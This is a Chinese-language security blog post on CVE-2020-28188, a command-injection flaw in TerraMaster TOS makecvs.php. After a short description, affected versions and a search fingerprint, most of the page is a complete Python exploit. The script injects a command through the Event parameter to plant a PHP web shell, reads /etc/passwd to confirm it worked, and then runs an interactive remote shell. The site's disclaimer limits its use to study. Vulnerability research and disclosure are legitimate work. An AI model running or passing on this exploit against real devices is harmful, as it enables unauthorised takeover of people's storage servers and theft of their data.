TerraMaster TOS makecvs.php 远程命令执行漏洞 #CVE-2020-28188-秋刀鱼实验室

漏洞描述

TerraMaster TOS 4.2.06 以下中 makecvs.php 存在任意文件写入，攻击者可以上传恶意文件控制服务器。

漏洞影响

TerraMaster TOS < 4.2.06

网络测绘

“TerraMaster” && header=”TOS”

漏洞复现

登录页面如下

存在漏洞的为 /include/makecvs.php 中的Event参数

使用EXP文件上传并执行命令

漏洞POC

# Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated)
# Date: 12/12/2020
# Exploit Author: IHTeam
# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
# Vendor Homepage: https://www.terra-master.com/
# Version: <= 4.2.06
# Tested on: 4.1.30, 4.2.06

#!/usr/bin/env python3
import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

parser = argparse.ArgumentParser(description="TerraMaster TOS <= 4.2.06 Unauth RCE")
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8081/")
args = parser.parse_args()

url = args.url
headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
epoch_time = int(time.time())
shell_filename = "debug"+str(epoch_time)+".php"

def check_endpoint(url, headers):
	response = requests.get(url+'/version', headers=headers, verify=False)
	if response.status_code == 200:
		print("[+] TerraMaster TOS version: ", str(response.content))
	else:
		print("\n[-] TerraMaster TOS response code: ", response.status_code)
		sys.exit()
		
def upload_shell(url, headers, shell_filename):
	payload = "http|echo \"<?php echo(passthru(\\$_GET['cmd']));?>\" >> /usr/www/"+shell_filename+" && chmod +x /usr/www/"+shell_filename+"||"
	payload = urllib.parse.quote(payload, safe='')
	print("[/] Uploading shell...")
	response = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False)
	time.sleep(1)
	response = requests.get(url+'/'+shell_filename+'?cmd=cat /etc/passwd', headers=headers, verify=False)
	if ('root:' in str(response.content, 'utf-8')):
		print("[+] Upload succeeded")
	else:
		print("\n[-] Error uploading shell: ", response.content)
		sys.exit()

def interactive_shell(url, headers, shell_filename, cmd):
	response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False)
	print(str(response.text)+"\n")


def delete_shell(url, headers, shell_filename):
	delcmd = "rm /usr/www/"+shell_filename
	response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False)
	print("\n[+] Shell deleted")

upload_shell(url, headers, shell_filename)
try:
	while True:
		cmd = input("# ")
		interactive_shell(url, headers, shell_filename, cmd)
except:
	delete_shell(url, headers, shell_filename)

本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自秋刀鱼实验室

使用声明 1、秋刀鱼实验室
2、使用本实验室相关内容时请严格遵守《中华人民共和国网络安全法》
3、本网站的文章部分内容可能来源于网络，仅供学习参考，如有侵权，请联系support@saury.net进行删除处理。
4、本网站的文章内容仅供学习使用，切勿进行非授权测试，文章阅读者行为与本站无关。
5、本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
6、本站一律禁止以任何方式发布或转载任何违法的相关信息。
7、如发现文件链接失效，请联系我们第一时间更新。

THE END

Web应用漏洞

TerraMaster TOS makecvs.php 远程命令执行漏洞 #CVE-2020-28188

漏洞描述

漏洞影响

网络测绘

漏洞复现

漏洞POC

请登录后发表评论